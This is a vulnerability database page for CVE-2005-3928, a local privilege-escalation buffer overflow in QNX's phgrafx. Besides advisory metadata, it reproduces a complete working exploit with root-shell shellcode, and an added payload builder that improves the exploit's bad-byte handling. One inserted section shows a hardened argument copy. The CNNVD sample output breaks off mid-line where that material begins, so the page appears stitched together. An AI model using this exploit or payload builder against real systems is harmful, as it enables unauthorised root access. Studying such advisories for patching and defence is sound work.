CVE-2005-3928
CVSS 4.6
Published: 2005-11-30 06:03:00
Revised: 2011-03-07 21:27:23

[Original] Buffer overflow in phgrafx in QNX 6.2.1 and 6.3.0 allows local users to execute arbitrary code via a long command line argument.


[CNNVD] QNX Neutrino local privilege escalation vulnerability (CNNVD-200511-489)

        QNX Neutrino is a microkernel real-time operating system for embedded devices.
        The "phgrafx" utility shipped with QNX Neutrino contains a buffer overflow; a malicious local user can exploit it to escalate privileges.
        For example:
        qnx$ uname -a; id
        QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
        uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
        qnx$ gcc phex.c -o phex -W
        qnx$ ./phex
        shellcode length: 21
        address: 0x8047a2c
        Warning: can not find palette under '55
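The advisory says only that a long command-line argument overflows a buffer in phgrafx. The C below is an added example, not phgrafx's source (which this page does not show): a hypothetical unbounded argv copy of the kind described, beside a length-checked version that rejects over-long arguments instead of truncating them. The buffer size CMD_MAX and the function names are assumptions; the only figure taken from the page is the exploit's 864-byte distance to the return-address spray.

```c
/* argcopy.c: added example, not phgrafx's code.
 * Shows the bug class the advisory describes, an unbounded copy of a
 * command-line argument into a fixed stack buffer, beside a checked version. */
#include <stdio.h>
#include <string.h>

#define CMD_MAX 256   /* hypothetical buffer size; phgrafx's real size is unknown */

/* Vulnerable: strcpy() stops only at the NUL, so an argument of CMD_MAX or
 * more bytes overwrites whatever follows cmd on the stack, eventually the
 * saved return address (the exploit on this page sprays it from offset 864). */
int handle_arg_unsafe(const char *arg) {
    char cmd[CMD_MAX];
    strcpy(cmd, arg);
    return (int)strlen(cmd);
}

/* Hardened: measure first, reject anything that does not fit together with
 * its terminator, then copy with an explicit length. Returns the number of
 * bytes copied, or -1 when the argument is too long. */
int handle_arg_safe(const char *arg, char *cmd, size_t cmd_size) {
    size_t n = strlen(arg);
    if (n >= cmd_size)
        return -1;
    memcpy(cmd, arg, n + 1);
    return (int)n;
}

/* Same fixed buffer as the unsafe version, but through the checked copy. */
int handle_arg(const char *arg) {
    char cmd[CMD_MAX];
    return handle_arg_safe(arg, cmd, sizeof cmd);
}

int main(int argc, char **argv) {
    const char *arg = argc > 1 ? argv[1] : "example";
    int n = handle_arg(arg);
    if (n < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", CMD_MAX - 1);
        return 1;
    }
    printf("accepted %d bytes\n", n);
    return 0;
}
```

Rejecting rather than silently truncating is deliberate: a truncated command string can still be parsed as something the caller did not intend, while a clear error keeps the failure visible.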

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no specialized access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:qnx:rtos:6.3.0
cpe:/a:qnx:rtos:6.2.1

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3928
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3928
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-489
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2005/2669
(UNKNOWN)  VUPEN  ADV-2005-2669
http://www.securityfocus.com/bid/16539
(UNKNOWN)  BID  16539
http://www.securityfocus.com/bid/15619
(UNKNOWN)  BID  15619
http://www.securityfocus.com/archive/1/archive/1/418105/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051129 possible privilege escalation on QNX Neutrino 6.3.0
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=384
(UNKNOWN)  IDEFENSE  20060207 QNX Neutrino RTOS phgrafx Command Buffer Overflow
http://securitytracker.com/id?1015599
(UNKNOWN)  SECTRACK  1015599
http://secunia.com/advisories/17781
(UNKNOWN)  SECUNIA  17781

- Vulnerability information

QNX Neutrino local privilege escalation vulnerability
Medium severity  Buffer overflow
2005-11-30 00:00:00 2006-06-12 00:00:00
Local

- Advisories and patches

        No data available

- Vulnerability information (1347)

QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86) (EDBID:1347)
QNX local
2005-11-30 Verified
p. minervini
/*
 * minervini@neuralnoise.com (c) 2005, all rights reserved.
 * sample exploit for phgrafx on QNX 6.3.0 x86
 *
 * tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
 */

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen(), memcpy(), memset() */
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif

/* offset within the argument at which the saved return address is
 * overwritten; from here up to byte 1023 the guessed stack address
 * is repeated */
#ifndef _RET_INIT
# define _RET_INIT (864)
#endif

/* thanks to my friend pi3 that suggested me to call a libc
 * function to make the shellcode way shorter than it was */

/* 21 bytes: build "/bin//sh\0" on the stack, push its address as the
 * only argument and call system() through %ebx; the 0xDEADBEEF
 * immediate (bytes 15..18) is patched with system()'s address in main() */
char scode[] = "\x31\xc0"      // xor    %eax,%eax
 "\x50"                        // push   %eax
 "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
 "\x54"                        // push   %esp
 "\xbb\xEF\xBE\xAD\xDE"        // mov    $0xDEADBEEF,%ebx
 "\xff\xd3";                   // call   *%ebx

/* returns this frame's %esp via %eax; relies on the x86 return-value
 * convention and on being compiled without optimisation */
unsigned long get_sp (void) {
  __asm__ ("movl %esp, %eax");
}

int main (int argc, char **argv) {

  int i, slen = strlen (scode), offset = 0;
  long ptr, *lptr, addr;
  char *buf;
  void *handle;

  /* resolve system() in our own image; the exploit assumes libc is
   * mapped at the same address inside phgrafx */
  handle = dlopen (NULL, RTLD_LAZY);
  addr = (long) dlsym (handle, "system");

  /* the address travels inside an argv string, so it must contain no
   * 0x00 (ends the argument) and no 0x09/0x0a (phgrafx truncates at them) */
  for (i = 0; i < 4; i++) {
     char temp = (*((char *) &addr + i) & 0xff);
     if (temp == 0x00 || temp == 0x09 || temp == 0x0a) {
        puts
          ("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, so it probably won't work since"
           " the application seems to truncate those bytes. BTW you can rely on functions like exec*(), spawn*()"
           " or MsgSend*() to get this working.\n"
           "more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/");
        return (-1);
     }
  }

  /* patch the call target into the "mov $imm32,%ebx" instruction */
  memcpy((char *)&scode + 0xf, &addr, 4);

  /* optional offset subtracted from our %esp to guess phgrafx's stack */
  if (argc > 1)
    offset = strtoul(argv[1], NULL, 0);

  if (!(buf = (char *) malloc(1032)))
    err(1, "malloc()");

  memset(buf, 0, 1032);

  /* sled: 'A' decodes as "inc %ecx", harmless wherever execution lands */
  for (i = 0; i < (_RET_INIT - slen); i++)
    buf[i] = 'A'; // inc %ecx

  printf("shellcode length: %d\n", slen);

  /* shellcode sits immediately before the return-address spray */
  for (i = (_RET_INIT - slen); i < _RET_INIT; i++)
    buf[i] = scode[i - (_RET_INIT - slen)];

  lptr = (long *) (buf + _RET_INIT);

  printf("address: 0x%lx\n", ptr = (get_sp () - offset));

  /* repeat the guessed address up to byte 1023; buf[1024] stays NUL */
  for (i = 0; i < ((1024 - _RET_INIT) / 4); i++)
    *(lptr + i) = (int) ptr;

  /* the whole buffer is passed to phgrafx as a single argument */
  execl(_PATH, "phgrafx", buf, NULL);

  return (0);
}
// milw0rm.com [2005-11-30]
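Added example, not part of the exploit above and not run against phgrafx: a rebuild of the payload layout the exploit uses, with the bad-byte check applied to both the call target and the sprayed return address. The exploit screens only system()'s address for 0x00/0x09/0x0a; the return address it takes from get_sp() is printed but never checked, although it travels through the same argv string, so a guess such as 0x08040a2c would hit the same truncation. The offsets 864 and 1024, the 21-byte stub and the address 0x08047a2c come from the exploit and its sample run; the value used for system()'s address is a placeholder, and the function names are this example's own.

```c
/* payload_layout.c: added example, not the exploit's code. Builds the
 * [ 'A' sled ][ shellcode ][ ret ret ret ... ] NUL argument the exploit
 * hands to phgrafx and refuses any address that argv cannot carry. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define RET_OFF   864   /* _RET_INIT: where the return-address spray begins */
#define TOTAL_LEN 1024  /* bytes before the terminating NUL, as in the exploit */
#define CALL_IMM  15    /* offset of the imm32 in "mov $addr,%ebx" (0xf above) */

/* Same 21-byte stub as the exploit: push "/bin//sh", push its address, call *%ebx. */
static const unsigned char stub[] =
    "\x31\xc0"                 /* xor  %eax,%eax  (NUL terminator for the string) */
    "\x50"                     /* push %eax */
    "\x68\x2f\x2f\x73\x68"     /* push $0x68732f2f  "//sh" */
    "\x68\x2f\x62\x69\x6e"     /* push $0x6e69622f  "/bin" */
    "\x54"                     /* push %esp        (pointer to "/bin//sh") */
    "\xbb\xef\xbe\xad\xde"     /* mov  $0xdeadbeef,%ebx  (patched below) */
    "\xff\xd3";                /* call *%ebx */
#define STUB_LEN (sizeof stub - 1)

/* 0x00 ends an argv string; the exploit reports 0x09 and 0x0a as truncated. */
static int is_bad_byte(unsigned char b) {
    return b == 0x00 || b == 0x09 || b == 0x0a;
}

/* Index (0 = least significant byte) of the first bad byte in a
 * little-endian 32-bit value, or -1 if the value is clean. */
int first_bad_byte(uint32_t v) {
    for (int i = 0; i < 4; i++)
        if (is_bad_byte((unsigned char)(v >> (8 * i))))
            return i;
    return -1;
}

/* Copy the stub into out and patch the call target (system()'s address,
 * obtained with dlsym() in the exploit) at CALL_IMM. Returns the stub
 * length, or -1 if addr contains a bad byte or out is too small. */
long prepare_shellcode(uint32_t addr, unsigned char *out, size_t out_size) {
    if (out_size < STUB_LEN || first_bad_byte(addr) >= 0)
        return -1;
    memcpy(out, stub, STUB_LEN);
    for (int i = 0; i < 4; i++)                 /* little-endian immediate */
        out[CALL_IMM + i] = (unsigned char)(addr >> (8 * i));
    return (long)STUB_LEN;
}

/* Lay the argument out exactly as the exploit does, but also refuse a
 * return address or a stub byte that the argv path would mangle.
 * Returns TOTAL_LEN on success, -1 otherwise. */
long build_payload(unsigned char *out, size_t out_size,
                   const unsigned char *sc, size_t sc_len, uint32_t ret) {
    if (out_size < TOTAL_LEN + 1 || sc_len > RET_OFF || first_bad_byte(ret) >= 0)
        return -1;
    for (size_t i = 0; i < sc_len; i++)
        if (is_bad_byte(sc[i]))
            return -1;
    size_t sled = RET_OFF - sc_len;
    memset(out, 'A', sled);                     /* 'A' == inc %ecx */
    memcpy(out + sled, sc, sc_len);
    for (size_t off = RET_OFF; off + 4 <= TOTAL_LEN; off += 4)
        for (int i = 0; i < 4; i++)
            out[off + i] = (unsigned char)(ret >> (8 * i));
    out[TOTAL_LEN] = '\0';                      /* execl() needs a C string */
    return TOTAL_LEN;
}

int main(void) {
    unsigned char sc[64], payload[TOTAL_LEN + 8];
    uint32_t system_addr = 0xb7e0f0c0;          /* placeholder; use dlsym() live */
    uint32_t ret = 0x08047a2c;                  /* address from the sample run */
    long n = prepare_shellcode(system_addr, sc, sizeof sc);
    if (n < 0 || build_payload(payload, sizeof payload, sc, (size_t)n, ret) < 0) {
        fprintf(stderr, "bad byte in an address; pick another target or offset\n");
        return 1;
    }
    printf("shellcode length: %ld, argument length: %zu, spray from offset %d\n",
           n, strlen((char *)payload), RET_OFF);
    return 0;
}
```

When the check fails for system(), the exploit's own comment applies: pick another libc entry point that starts a program (exec*, spawn*) whose address happens to be clean; when it fails for the return address, adjust the offset argument so the guess moves past the bad byte.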
		

- Vulnerability information

21266
QNX RTOS phgrafx Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-11-28 Unknown
2005-11-28 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.